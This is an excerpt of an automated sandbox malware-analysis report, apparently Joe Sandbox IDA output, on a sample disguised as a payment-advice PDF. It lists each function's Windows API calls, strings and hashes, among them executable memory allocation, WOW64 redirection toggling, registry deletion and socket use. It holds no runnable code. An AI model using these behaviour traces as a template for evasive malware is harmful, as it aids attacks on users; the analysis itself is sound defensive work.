                                                              • Instruction ID: e99a4a455047e942e2b917c2bc0da54500f698d962725b840163ed44e1c669c1
                                                              • Opcode Fuzzy Hash: bcf425b81f194a4929742561dca18a810b252840712ac0d9221502273977dce4
                                                              • Instruction Fuzzy Hash: 3431AD3120460AABEB118E38CC45FEA7BB9FB05324F208729F975E22E1D735E9559B50
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008C7461
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008C7475
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 008C7499
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 4d686e25cbd248e9608947bf573ee038db134c55c5f00fbc4004832e9518acd2
                                                              • Instruction ID: 5328e4d1b754f6ca3c14fdf2f7dc4e394659ff25955fd7fc35de9f9aca4866c6
                                                              • Opcode Fuzzy Hash: 4d686e25cbd248e9608947bf573ee038db134c55c5f00fbc4004832e9518acd2
                                                              • Instruction Fuzzy Hash: 18219132500218ABDF158F64CC46FEA3B7AFB48724F110218FE55AB190DA75EC91DBA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008C7C4A
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008C7C58
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008C7C5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: 6b300c6dc04a369ba8c9596cdfc7eae6dd1ea2ac0024cb6636242e3a36fa502a
                                                              • Instruction ID: d5d904e758838101db619fe3d154c938b8609150a4ae5cb1eb5aaeaceff61dbc
                                                              • Opcode Fuzzy Hash: 6b300c6dc04a369ba8c9596cdfc7eae6dd1ea2ac0024cb6636242e3a36fa502a
                                                              • Instruction Fuzzy Hash: D0216BB1604209AFEB10DF28DCC1EA737FDFB59364B154059FA05DB3A1CA31EC519A60
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008C6D3B
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008C6D4B
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008C6D70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 4a3e2cc5a743becd8c6eb8608eba0e69c2f5ca235ab7d6a97c2c9aae690d5455
                                                              • Instruction ID: 0ebc9638ff9cbd2bee74090aff7b64f429990937ae34e3040c3c709002127974
                                                              • Opcode Fuzzy Hash: 4a3e2cc5a743becd8c6eb8608eba0e69c2f5ca235ab7d6a97c2c9aae690d5455
                                                              • Instruction Fuzzy Hash: 5E216D32610118ABEB118F54DC45FAB3BBAFB89760F018138FA459B1A0D671DC619BA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008C7772
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008C7787
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008C7794
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: 10c2767d421fc7f025d36b10405cfec9c4c488c5513f1018475b923d0ff9769b
                                                              • Instruction ID: 4246e2d0d47f3d50b438a697a22173d8508275946b634d0862225608fb4cb26a
                                                              • Opcode Fuzzy Hash: 10c2767d421fc7f025d36b10405cfec9c4c488c5513f1018475b923d0ff9769b
                                                              • Instruction Fuzzy Hash: F911C17224420CBAEF245F65CC05FAB7BB9FF88B64F11422CFA55E6190D672E851DB20
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00844BD0,?,00844DEF,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844C11
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00844C23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 9fb9fb203222cc33632530faf8a2989f8b78f90cf52fe9262f7a6e1af50d4d6e
                                                              • Instruction ID: 27d6630152631668fa166fbe3a3e58414e0a8bb1ae5cf6b69668f75b17e9f6d6
                                                              • Opcode Fuzzy Hash: 9fb9fb203222cc33632530faf8a2989f8b78f90cf52fe9262f7a6e1af50d4d6e
                                                              • Instruction Fuzzy Hash: 78D01234911717CFE7205F71D948B06BAE6FF09351B19CC3E9596D6251E7B4D880C650
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00844B83,?), ref: 00844C44
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00844C56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: cba410c41cd5e191fffe9138f2a62ced8071fc7e33a1a22df151f59e47f7db02
                                                              • Instruction ID: d40b5ce287f058daba80167a575e62e3a212c721b37365f8eba268ce03885204
                                                              • Opcode Fuzzy Hash: cba410c41cd5e191fffe9138f2a62ced8071fc7e33a1a22df151f59e47f7db02
                                                              • Instruction Fuzzy Hash: 54D01730510727CFE7209F31D948B1AB6E6FF15351B19C83EA6A6D6261E774D880CA50
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,008C1039), ref: 008C0DF5
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008C0E07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: 08fc70de52f7b7b6b53fefda63e3d930e101e1087cfe0c63dac945ffe054c4f6
                                                              • Instruction ID: 9ca19e34dc9ef1d0177de961e404901a8d0da82d54bd83d8f26b5049286237ff
                                                              • Opcode Fuzzy Hash: 08fc70de52f7b7b6b53fefda63e3d930e101e1087cfe0c63dac945ffe054c4f6
                                                              • Instruction Fuzzy Hash: 7FD08230440326CFE3218F70C808B8272E6FF08392F048C2ED692C6252E6B4D8908A00
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008B8CF4,?,008CF910), ref: 008B90EE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008B9100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 473d5fd5fcf7f754af5df89fe27f53a862d58e497ccb04ede285fe64c0108e32
                                                              • Instruction ID: 13f7aedd473790e3e6fe15e2dd42aaa8e5f18c39f3fb716c66eb93d531487f46
                                                              • Opcode Fuzzy Hash: 473d5fd5fcf7f754af5df89fe27f53a862d58e497ccb04ede285fe64c0108e32
                                                              • Instruction Fuzzy Hash: E0D01235510713CFE7209F35D818A4676E5FF05351B15C87ED6D6D6761EB78C880CA50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: 63ff7dbb91b56eddaeadd9065c0315c01bacbc4c4755c892bda90f485d0c26de
                                                              • Instruction ID: 41561fc35c093be645e9b135ddc99017c79158aaed79591e8386725d9b600912
                                                              • Opcode Fuzzy Hash: 63ff7dbb91b56eddaeadd9065c0315c01bacbc4c4755c892bda90f485d0c26de
                                                              • Instruction Fuzzy Hash: BFD0177184610DEACF50BB90988CCB9737CFB18309F10086AF606E2094EA358B96EB21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba6277d6523c26ff82a94c21541e85d5f1dadb71dda4d11ff68c472d6930086c
                                                              • Instruction ID: 42f166c0a9b7fa125089676559c60f263aa4a3e8712ca4f8a032c9dd49c2a6ef
                                                              • Opcode Fuzzy Hash: ba6277d6523c26ff82a94c21541e85d5f1dadb71dda4d11ff68c472d6930086c
                                                              • Instruction Fuzzy Hash: E4C14E74A1421AEFCF14DFA4C884EAEBBB5FF48714B198598E805EB251D730ED81DB90
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 008BE0BE
                                                              • CharLowerBuffW.USER32(?,?), ref: 008BE101
                                                                • Part of subcall function 008BD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008BD7C5
                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008BE301
                                                              • _memmove.LIBCMT ref: 008BE314
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                              • String ID:
                                                              • API String ID: 3659485706-0
                                                              • Opcode ID: 458040d637e5ec7471d60b55443cbdaa2955ea5c509feaba119f036ffb89bf33
                                                              • Instruction ID: b09e0678b1fde8a790b094144c3c9aa07e5dabc84985b3497a62e1bc4f0bc0cd
                                                              • Opcode Fuzzy Hash: 458040d637e5ec7471d60b55443cbdaa2955ea5c509feaba119f036ffb89bf33
                                                              • Instruction Fuzzy Hash: 48C106716083059FC714DF28C480AAABBE4FF89714F14896EF999DB352D731E946CB82
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 008B80C3
                                                              • CoUninitialize.OLE32 ref: 008B80CE
                                                                • Part of subcall function 0089D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0089D5D4
                                                              • VariantInit.OLEAUT32(?), ref: 008B80D9
                                                              • VariantClear.OLEAUT32(?), ref: 008B83AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: 54c44ed3a3f9fd116de746416fdbb8222555c757828272e0060691522ad086b7
                                                              • Instruction ID: efae275a2d8ca0a4e2a2bcc68d3bc10449507b0aa3b98ee77a758749aa2c48ca
                                                              • Opcode Fuzzy Hash: 54c44ed3a3f9fd116de746416fdbb8222555c757828272e0060691522ad086b7
                                                              • Instruction Fuzzy Hash: B3A125756047059FDB20DF18C881A6AB7E8FF89754F044459F99ADB3A2CB30ED05CB86
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008D2C7C,?), ref: 008976EA
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008D2C7C,?), ref: 00897702
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,008CFB80,000000FF,?,00000000,00000800,00000000,?,008D2C7C,?), ref: 00897727
                                                              • _memcmp.LIBCMT ref: 00897748
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FromProg$FreeTask_memcmp
                                                              • String ID:
                                                              • API String ID: 314563124-0
                                                              • Opcode ID: 4a8088f65c79fbc0acbe95fad55848a6b834f9800e014e1ee45e106829f6b33a
                                                              • Instruction ID: fcd90dfbdb857ee170c03ea0a6c1619e9ef35a0330bf681e33e9d6efff8c4732
                                                              • Opcode Fuzzy Hash: 4a8088f65c79fbc0acbe95fad55848a6b834f9800e014e1ee45e106829f6b33a
                                                              • Instruction Fuzzy Hash: 9281F775A10109EFCF04DFA8C984EEEB7B9FF89315B244558E506EB250DB71AE06CB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 1b8000a987ba62e646b495be53f82c727e173fa1944a1cd1d88c161666cddbdb
                                                              • Instruction ID: d8206e2e80cb9d0d3d7e783b41d2c3652452f74d0e50e2958a9e5c751fe9c211
                                                              • Opcode Fuzzy Hash: 1b8000a987ba62e646b495be53f82c727e173fa1944a1cd1d88c161666cddbdb
                                                              • Instruction Fuzzy Hash: AB51A0746003059ADF24BF69D891A2EB7E6FF45314F28C81FE596EB291FB34D8608706
                                                              APIs
                                                              • GetWindowRect.USER32(0162E840,?), ref: 008C9863
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 008C9896
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 008C9903
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: ad39ac13a2b719d9938a7ec73abe86fdc4089414bcdc2e8c5c0cb71621e2fc49
                                                              • Instruction ID: 23d489b39893b53807632b269ea2f884690310756f2077c1cf1f6c819aab50a6
                                                              • Opcode Fuzzy Hash: ad39ac13a2b719d9938a7ec73abe86fdc4089414bcdc2e8c5c0cb71621e2fc49
                                                              • Instruction Fuzzy Hash: F751FA34A00609AFDB10CF58C888EAE7BB6FB55360F1481ADF995DB2A0D731ED41DB90
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00899AD2
                                                              • __itow.LIBCMT ref: 00899B03
                                                                • Part of subcall function 00899D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00899DBE
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00899B6C
                                                              • __itow.LIBCMT ref: 00899BC3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 0501d82efab7092638caad9974f54ed49e5ecb2cd2e8e9820c4c39ffbf24cb95
                                                              • Instruction ID: 33dcceae7169c873a1bf440bd458fb05ef4198fed52e588349c5c801ed1ff1c0
                                                              • Opcode Fuzzy Hash: 0501d82efab7092638caad9974f54ed49e5ecb2cd2e8e9820c4c39ffbf24cb95
                                                              • Instruction Fuzzy Hash: 45413D74A0021CABDF11EF68D885BAE7FB9FF44724F040069F945E6291DB749A44CBA2
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 008B69D1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B69E1
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008B6A45
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B6A51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                              • String ID:
                                                              • API String ID: 2214342067-0
                                                              • Opcode ID: c10d28d3c90f164cdb24b8cf6852d795791030320715578a3bb7d77b1d1a73d0
                                                              • Instruction ID: 304ab9bd7d1dfa772d1d9699c722df2c8c4c577d73581caa464a7e7f88b5458a
                                                              • Opcode Fuzzy Hash: c10d28d3c90f164cdb24b8cf6852d795791030320715578a3bb7d77b1d1a73d0
                                                              • Instruction Fuzzy Hash: BB418F75640214AFEB60BF28CC86F6A77A5FF04B14F048428FA59EB3D3DA749D108792
                                                              APIs
                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,008CF910), ref: 008B64A7
                                                              • _strlen.LIBCMT ref: 008B64D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
